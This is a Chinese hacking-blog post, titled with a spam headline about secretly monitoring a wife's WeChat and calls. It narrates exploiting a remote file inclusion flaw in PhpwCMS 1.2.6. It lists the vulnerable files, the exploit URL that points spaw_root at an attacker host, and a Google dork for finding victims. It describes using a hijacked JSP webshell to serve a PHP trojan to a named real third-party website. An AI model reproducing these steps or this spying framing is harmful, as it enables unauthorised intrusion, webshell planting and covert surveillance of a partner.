监控老婆微信和通话(怎么控制老婆微信聊天)

访客3年前黑客资讯985

最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php 

  include/inc_ext/spaw/dialogs/a.php 

  include/inc_ext/spaw/dialogs/colorpicker.php 

  include/inc_ext/spaw/dialogs/confirm.php 

  include/inc_ext/spaw/dialogs/img.php 

  include/inc_ext/spaw/dialogs/img_library.php 

  include/inc_ext/spaw/dialogs/td.php 

  文件中的$spaw_root的没有过滤的情况下,包含’**class/lang.class.php’。具体的代码公告中没给出来。可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的网站,website2是攻击的网站,website2所在的目录下有class/lang.class.php文件。 

  二、学习的之一天 

  马上行动,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多项结果,基本上都是国外的。看来这次发了,这次国外的wenshell肯定是一大堆了。呵呵……,嘿嘿……随便点击一个网站,是美国的:http://arena-sv.jans-webdesign.com,不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测,当然http://www.baidu.com/class/lang.class.php是不存在的,这时页面显示如图一所示,提示没有找到页面。这表明了这个网站存在文件包含漏洞,象这样的有漏洞的网站随便点击一个就是。 

  检测出有文件包含漏洞 

  现在开始利用这个漏洞,在我的支持asp网站根目录建一个class的目录,在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候,提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell,浏览的时候还是出现找不到文件的问题。 

三、学习的第二天 

  去搜索的发现有漏洞的网站变得比较少了,大部分的网站都被漏洞补了,还有一部分美国的网站上被挂了一些与反战争有关的图片或者一些国旗。还好的是昨天的哪个网站没有被人家黑掉,还有机会学习。我在无意中得到了jsp的wenshell,试着写了一个php文件,在浏览器浏览的时候出现的是源文件。看来现在现在可以利用这个jsp的webshell来作跳板。 

  在webshell里面建一个class的文件夹,然后在class目录里面上传一个lang.class.php空文件,在文件里面写上.在浏览器上浏览http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 显示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。 

  php环境信息 

  编辑lang.class.php的文件,先写了一个phpspy。但是登陆webshell的后,页面转到其他的页面。还是先传一可以上传的文件的马儿吧,传了一个国外的php木马,木马的功能很的大,浏览http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。 

相关文章

黑客头像面具高清头像图片(黑客头像图片 高清)

黑客头像面具高清头像图片(黑客头像图片 高清)

本文导读目录: 1、这个图片叫什么?↓ 2、戴面具男生动漫头像 3、求张图片!要一张戴面具的头像! 4、还有没有其他这种头像 都是戴面具黑色衣服 5、急求几张白色面具头像。越帅越好!!...

苹果11快捷指令在哪里

快捷指令在App Store可以下载,它的应用规定是务必手机的系统在iOS13之上,要是没有做到规定就不可以应用。开启App Store,搜索网页,键入快捷指令,搜索网页,然后点一下右边的下载图标,免...

找黑客高手黑公务员报名-增长黑客啊哈时刻是什么意思(增长黑客的本质是什么)

找黑客高手黑公务员报名-增长黑客啊哈时刻是什么意思(增长黑客的本质是什么)

找黑客高手黑公务员报名相关问题 黑客自学网站大全相关问题 黑客怎么查看陌生人朋友圈 外网网站(外网网站大全) 黑...

红包吉利数字是多少(浅谈各种关系发红包的含义)

红包吉利数字是多少(浅谈各种关系发红包的含义)

  完婚是一件好意头幸福快乐的事儿,很多人为了更好地表述自身的祝愿都是会给新手发红包,可是送是多少这一数据也是有注重的,红包给多少吉利数字、红包给多少适合及其媒婆红包给多少呢?下边一起来瞧瞧吧!...

中国传统节日的作文(中国传统节日优秀作文)

  中国传统节日的作文(中国传统节日优秀作文)   写作有温度,交流有热度,点击右上角“关注”,刘老师与你一起探讨小学生作文相关问题,孩子成长路上,我们一同奋力前行。   01听故事   中国传统文化...

想说给你听是谁唱的歌(想说给你听歌词,在线

想说给你听是谁唱的歌(想说给你听歌词,在线

这一路的故事,我只想说给你听。 那些人,那些事,那些离歌与泪水,那些诗与远方。 如今,我再次回到你的面前,从昨天到今天,穿过迷惘,迎接阳光,尽管我已经是满脸沧桑。 风吹过山谷,云雾低垂。要在...